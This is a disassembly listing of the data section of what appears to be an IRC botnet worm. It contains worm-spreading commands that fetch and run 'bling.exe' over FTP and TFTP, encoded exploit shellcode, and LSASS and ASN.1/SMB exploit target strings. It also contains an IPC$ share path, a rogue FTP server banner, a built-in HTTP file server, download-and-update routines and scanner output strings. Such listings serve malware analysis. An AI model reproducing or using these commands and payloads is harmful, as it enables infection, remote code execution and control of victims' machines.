; DATA XREF: sub_402D46+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_42AA1C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402D46+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_42AA90 dd 0 ; DATA XREF: sub_402D46+35F�o
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 2 dup(0)
word_42AB18 dw 0AD9Dh ; DATA XREF: sub_402B90+30�r
; sub_402D46+E7�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_42AB58 dd 1004600h ; DATA XREF: sub_402D46+140�r
; sub_402D46+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 8Dh dup(0)
aS db '%s',0Dh,0Ah,0 ; DATA XREF: sub_402B90+100�o
; sub_4087B3+2FAD�o ...
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_402B90+BC�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
dd 5 dup(0)
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_402B90+97�o
align 8
dword_42AEA8 dd 6EB06EBh, 0 ; DATA XREF: sub_402D46+177�o
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_402D46+27�o
align 4
dword_42AEBC dd 1CEC8166h ; DATA XREF: sub_402D46+D�r
dword_42AEC0 dd 0E4FF07h ; DATA XREF: sub_402D46+16�r
align 8
dword_42AEC8 dd 5D73255Bh, 3403203Ah, 1F5B1F02h, 78452002h, 696F6C70h
; DATA XREF: .text:00403402�o
dd 676E6974h, 20504920h, 1F5D1F02h, 0BB200302h, 2520BBBBh
dd 2E73h, 3 dup(0)
aAsn1http_0 db 'asn1http',0 ; DATA XREF: .text:0040405F�o
align 2
aAsn1http db 'asn1http',0 ; DATA XREF: sub_402413+1C8�o
; .text:004033FC�o
align 4
dd 5 dup(0)
dword_42AF28 dd 50h ; DATA XREF: sub_4034D1+1E�r
; sub_4087B3+2185�r ...
off_42AF2C dd offset sub_4011B8 ; DATA XREF: .text:004040E1�r
dword_42AF30 dd 0 ; DATA XREF: sub_402413+1FC�w
; sub_402413+202�r ...
dword_42AF34 dd 1 ; DATA XREF: sub_403661+1F�r
dword_42AF38 dd 1 ; DATA XREF: sub_403661:loc_4038D2�r
aAsn1smb db 'asn1smb',0
dd 73610000h, 6D73316Eh, 62h, 5 dup(0)
dd 1BDh, 4011B8h, 0
dd 2 dup(1), 316E7361h, 6E626D73h, 73610074h, 6D73316Eh
dd 746E62h, 5 dup(0)
dd 8Bh, 4011B8h, 0
dd 2 dup(1), 7361736Ch, 73h, 534C0000h, 2D735361h, 2D353434h
dd 2D646F4Dh, 33726D65h, 3 dup(0)
dd 1BDh, 401294h, 0
dd 2 dup(1), 10h dup(0)
aAsn1smbnt db 'asn1smbnt',0
byte_42B03A db 1 ; DATA XREF: sub_4087B3:loc_40C15B�r
; sub_4087B3+39B2�o
aAsn1smb_0 db 'asn1smb',0
align 4
dd 100h, 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h, 24h dup(0)
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_4034D1+81�o
align 4
dd 0
aSD db ' %s: %d,',0 ; DATA XREF: sub_4034D1+42�o
align 4
dword_42B288 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4034D1+11�o
aExploitStatist db ' Exploit Statistics:',0
align 4
dd 2 dup(0)
dword_42B2BC dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4035CD+42�o
aScanNotActive_ db ' Scan not active.',0
align 4
dd 2 dup(0)
dword_42B2EC dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4035CD+2C�o
dd 72754320h, 746E6572h, 3A504920h, 2E732520h, 2 dup(0)
unk_42B318 db 2 ; DATA XREF: sub_403661+36F�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToStartS db ' Failed to start server, error: <%d>.',0
align 10h
unk_42B360 db 2 ; DATA XREF: sub_403661+307�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aServerListenin db ' Server listening on IP: %s:%d, Directory: %s\.',0
align 4
dd 3 dup(0)
unk_42B3B4 db 2 ; DATA XREF: sub_403661+267�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 66h, 74h
db 1Fh
db 70h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToStar_0 db ' Failed to start server, error: <%d>.',0
align 10h
dd 2 dup(0)
unk_42B3F8 db 2 ; DATA XREF: sub_403661+1FA�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 66h, 74h
db 1Fh
db 70h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aServerStartedO db ' Server started on Port: %d, File: %s, Request: %s.',0
align 10h
dd 4 dup(0)
dword_42B450 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_403661+149�o
aFailedToStar_1 db ' Failed to start server, error: <%d>.',0
align 4
dd 3 dup(0)
dword_42B498 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_403661+DB�o
aServerStarte_0 db ' Server started on Port: %d, File: %s, Request: %s.',0
dd 4 dup(0)
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_403B34+38�o
; sub_4116BB+46�o
align 10h
aSocketClosed_ db 'Socket closed.',0 ; DATA XREF: .text:loc_403E76�o
align 10h
dd 0
aSocketOpen_ db 'Socket open.',0 ; DATA XREF: .text:00403E66�o
align 4
aRecvfromSocket db 'recvfrom() socket failed',0 ; DATA XREF: .text:00403E41�o
align 10h
dd 0
aSendtoSocketFa db 'sendto() socket failed. sent = %d <%d>.',0 ; DATA XREF: .text:00403DE7�o
dd 2 dup(0)
aSocketOpenFail db 'socket open failed',0 ; DATA XREF: .text:00403DB0�o
align 4
dd 0
dword_42B58C dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00403FE6�o
aIpSPortDIsOpen db ' IP: %s, Port %d is open.',0
align 4
dd 2 dup(0)
dword_42B5C4 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00403F8E�o
aIpSDScanThread db ' IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
dd 3 dup(0)
dword_42B614 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00404362�o
aFinishedAtSDAf db ' Finished at %s:%d after %d minute(s) of scanning.',0
align 4
dd 4 dup(0)
dword_42B66C dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00404307�o
aFailedToStartW db ' Failed to start worker thread, error: <%d>.',0
align 10h
dd 3 dup(0)
dword_42B6BC dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00404297�o
aSDScanThreadDS db ' %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
dd 3 dup(0)
dword_42B708 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:0040421B�o
aFailedToInitia db ' Failed to initialize critical section.',0
align 10h
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_40452A+35�o
align 10h
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_40452A+10�o
align 10h
dd 0
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_4045C0+60�o
align 4
dd 0
aLogs db '-[Logs]-',0 ; DATA XREF: .text:004046A4�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_40474C+1A�o
align 4
dword_42B7BC dd 20025B02h, 6F6C202Dh, 201F671Fh, 5D02202Dh, 20BB2002h
; DATA XREF: .text:004048B6�o
dd 73694C20h, 6F632074h, 656C706Dh, 2E6574h, 2 dup(0)
dword_42B7E8 dd 20025B02h, 6F6C202Dh, 201F671Fh, 5D02202Dh, 20BB2002h
; DATA XREF: .text:00404819�o
dd 67654220h, 6E69h, 0
dword_42B808 dd 78h ; DATA XREF: sub_4049E0+A�r
align 10h
dword_42B810 dd 80000002h, 42C9F8h, 80000002h, 42CA28h, 80000001h, 42CA60h
; DATA XREF: sub_404954+7�o
dword_42B828 dd 2 dup(0) ; DATA XREF: sub_404954+63�o
dword_42B830 dd 6272h ; DATA XREF: sub_404A47+B�o
; sub_40636F+24�o ...
unk_42B834 db 2 ; DATA XREF: .text:004051E0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 4
dd 2 dup(0)
unk_42B874 db 2 ; DATA XREF: .text:004051D2�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
dd 4 dup(0)
unk_42B8C8 db 2 ; DATA XREF: .text:00405116�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
dd 4 dup(0)
dword_42B924 dd 20025B02h, 6F64202Dh, 6F6C6E77h, 641F6C61h, 202D201Fh
; DATA XREF: .text:004050A5�o
dd 20025D02h, 4F2020BBh, 656E6570h, 25203A64h, 2E73h, 2 dup(0)
aOpen db 'open',0 ; DATA XREF: .text:00405083�o
; sub_4087B3+1452�o ...
align 4
unk_42B95C db 2 ; DATA XREF: .text:0040502E�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 10h
dd 3 dup(0)
unk_42B9AC db 2 ; DATA XREF: .text:00404FAF�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aCrcFailedDD_ db ' CRC Failed (%d != %d).',0
align 10h
dd 2 dup(0)
unk_42B9E8 db 2 ; DATA XREF: .text:00404F25�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 4
dd 3 dup(0)
unk_42BA34 db 2 ; DATA XREF: .text:00404EE2�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 10h
dd 3 dup(0)
unk_42BA7C db 2 ; DATA XREF: .text:00404ED0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 10h
dd 3 dup(0)
unk_42BACC db 2 ; DATA XREF: .text:00404DC4�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 64h, 6Fh
db 77h ; w
db 6Eh, 6Ch, 6Fh
db 61h ; a
db 6Ch, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 10h
dd 3 dup(0)
aUnknown db 'Unknown',0 ; DATA XREF: sub_40545D:loc_4054A0�o
; sub_410B94+104�o
align 8
aInvalid db 'Invalid',0 ; DATA XREF: sub_40545D:loc_40549A�o
dd 0
aDisk db 'Disk',0 ; DATA XREF: sub_40545D:loc_405494�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40545D:loc_40548E�o
align 8
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40545D:loc_405488�o
align 10h
aRam db 'RAM',0 ; DATA XREF: sub_40545D:loc_405482�o
word_42BB44 dw 3Fh ; DATA XREF: sub_40545D+1F�o
; sub_414190:loc_414292�r
align 4
aFailed db 'failed',0 ; DATA XREF: sub_405512:loc_4055EA�o
; sub_405673+3B�o
align 10h
aSkb db '%sKB',0 ; DATA XREF: sub_405512+6B�o
align 4
unk_42BB58 db 2 ; DATA XREF: sub_405673+8E�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSDriveSSTotalS db ' %s Drive (%s): %s total, %s free, %s available.',0
align 10h
dd 3 dup(0)
unk_42BBAC db 2 ; DATA XREF: sub_405673+58�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aSDriveSFailedT db ' %s Drive (%s): Failed to stat, device not ready.',0
align 10h
aA_1 db 'A:\',0 ; DATA XREF: sub_405779:loc_4057BE�o
dword_42BC04 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: .text:00405A2B�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42BC50 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: .text:00405A6A�o
dword_42BC6C dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: .text:00405A9F�o
dword_42BC80 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 8 dup(0)
; DATA XREF: .text:00405AC6�o
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: .text:0040611D�o
dd 2 dup(0)
aQuit db 'QUIT',0 ; DATA XREF: .text:00406109�o
; sub_4087B3+534�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: .text:004060FC�o
align 10h
dd 0
dword_42BD04 dd 726D655Bh, 45205D33h, 6F6C7078h, 656C7469h, 2069646Eh
; DATA XREF: .text:004060B1�o
dd 203A7069h, 253A7325h, 61E72064h, 74FEFD6Ch, 6CFD72FDh
dd 203AFD64h, 7325h, 2 dup(0)
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: .text:00406092�o
align 8
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: .text:00406066�o
align 4
dd 2 dup(0)
aRetr db 'RETR',0 ; DATA XREF: .text:0040604E�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: .text:00406039�o
align 8
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: .text:00406028�o
align 8
aXX db '%x%x',0Ah,0 ; DATA XREF: .text:00405FF5�o
align 10h
aS_0 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: .text:00405FB4�o
db ']',0
align 10h
aPort db 'PORT',0 ; DATA XREF: .text:00405F7B�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: .text:00405F4D�o
align 10h
dd 0
aList db 'LIST',0 ; DATA XREF: .text:00405F3A�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: .text:00405EFF�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: .text:00405EEC�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: .text:00405EDC�o
align 10h
aI: ; DATA XREF: .text:00405EC8�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: .text:00405EA1�o
dd 0
aA: ; DATA XREF: .text:00405E8D�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: .text:00405E76�o
; .text:00405EB1�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: .text:00405E66�o
align 10h
off_42BED0 dd offset dword_445750 ; DATA XREF: .text:00405E52�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: .text:00405E42�o
align 4
aRest db 'REST',0 ; DATA XREF: .text:00405E2E�o
align 10h
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: .text:00405E1E�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: .text:00405E0A�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: .text:00405DFA�o
align 10h
dd 0
aPass db 'PASS',0 ; DATA XREF: .text:00405DE6�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: .text:00405DD6�o
align 8
aUser db 'USER',0 ; DATA XREF: .text:00405DC1�o
; .data:0042CBB4�o ...
align 10h
aSS db '%s %s',0 ; DATA XREF: .text:00405DB0�o
; .text:0040FEDC�o
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: .text:00405D28�o
align 10h
dd 0
unk_42BF74 db 2 ; DATA XREF: .text:00406827�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aErrorServerFai db ' Error: server failed, returned: <%d>.',0
align 10h
asc_42BFC0 db 0Dh,0Ah,0 ; DATA XREF: .text:004066FE�o
align 4
asc_42BFC4: ; DATA XREF: .text:004066C2�o
; sub_4087B3+A8�o ...
unicode 0, < >,0
aGet db 'GET ',0 ; DATA XREF: .text:00406698�o
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: .text:00406A96�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dd 0Ch dup(0)
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: .text:00406A73�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dd 0Bh dup(0)
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: .text:00406A37�o
; sub_414190+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: .text:00406A23�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: .text:loc_406A05�o
align 8
aTextHtml db 'text/html',0 ; DATA XREF: .text:004069FE�o
align 4
unk_42C244 db 2 ; DATA XREF: sub_406B82+28F�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToStar_2 db ' Failed to start worker thread, error: <%d>.',0
align 4
dd 3 dup(0)
unk_42C294 db 2 ; DATA XREF: sub_406B82+20B�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aWorkerThreadOf db ' Worker thread of server thread: %d.',0
align 10h
dd 3 dup(0)
dword_42C2DC dd 2Ah ; DATA XREF: sub_406B82+157�o
dword_42C2E0 dd 0Ah ; DATA XREF: sub_406B82+FB�o
; sub_406EDE+29�o
aSS_0 db '%s%s',0 ; DATA XREF: sub_406B82+EA�o
; sub_406EDE+4CA�o ...
align 4
aS_2 db '%s',0 ; DATA XREF: sub_406B82+3A�o
; sub_4087B3+172A�o ...
align 10h
aS_5 db '\%s',0 ; DATA XREF: sub_406B82+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_406EDE+64E�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_406EDE+633�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
dd 3 dup(0)
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_406EDE+618�o
align 4
dd 2 dup(0)
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_406EDE+589�o
align 4
dd 0
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_406EDE+561�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
dd 5 dup(0)
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_406EDE:loc_4073F6�o
align 10h
dd 0
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_406EDE+511�o
align 8
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_406EDE+471�o
align 10h
dd 0
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_406EDE+434�o
align 8
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_406EDE+401�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
dd 5 dup(0)
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_406EDE:loc_4072A0�o
align 10h
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_406EDE+3BB�o
align 10h
dd 0
aSS_1 db '%s%s/',0 ; DATA XREF: sub_406EDE+374�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_406EDE+330�o
; sub_406EDE+486�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
dd 2 dup(0)
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_406EDE+30E�o
align 10h
dd 0
aS_1 db '<%s>',0 ; DATA XREF: sub_406EDE+2E4�o
; sub_406EDE+413�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_406EDE+2BA�o
dd 2 dup(0)
aAm db 'AM',0 ; DATA XREF: sub_406EDE+290�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_406EDE+285�o
align 4
a__0: ; DATA XREF: sub_406EDE+24D�o
; .text:004114D6�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_406EDE+232�o
align 4
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_406EDE+1C0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
dd 4 dup(0)
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406EDE+147�o
align 10h
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_406EDE+12B�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
dd 2 dup(0)
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_406EDE+F7�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
dd 7 dup(0)
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_406EDE+AD�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 10h
